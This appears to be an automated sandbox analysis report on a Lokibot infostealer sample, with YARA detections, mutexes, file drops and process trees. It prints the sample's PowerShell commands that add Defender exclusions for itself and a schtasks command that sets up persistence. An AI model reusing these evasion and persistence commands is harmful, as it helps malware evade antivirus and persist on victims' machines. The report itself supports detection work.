Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1454881025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1429235724.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1428115991.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.1479318717.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: oAUBqI6vQ7.exe PID: 7616, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Xzacmv.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Xzacmv.exe PID: 4900, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/18@0/1

Source: C:\Users\user\AppData\Roaming\Xzacmv.exe

Code function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

15_2_0040434D

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File created: C:\Users\user\AppData\Roaming\Xzacmv.exe

Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Mutant created: \Sessions\1\BaseNamedObjects\ftswnJVnyUDYeHaauBhNxWAe

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9E72.tmp

Jump to behavior

Source: oAUBqI6vQ7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: oAUBqI6vQ7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: oAUBqI6vQ7.exe	ReversingLabs: Detection: 81%
Source: oAUBqI6vQ7.exe	Virustotal: Detection: 81%

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe

File read: C:\Users\user\Desktop\oAUBqI6vQ7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\oAUBqI6vQ7.exe "C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Users\user\Desktop\oAUBqI6vQ7.exe "C:\Users\user\Desktop\oAUBqI6vQ7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe C:\Users\user\AppData\Roaming\Xzacmv.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Process created: C:\Users\user\Desktop\oAUBqI6vQ7.exe "C:\Users\user\Desktop\oAUBqI6vQ7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Process created: C:\Users\user\AppData\Roaming\Xzacmv.exe "C:\Users\user\AppData\Roaming\Xzacmv.exe"	Jump to behavior

Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\oAUBqI6vQ7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Xzacmv.exe	Section loaded: wldp.dll	Jump to behavior
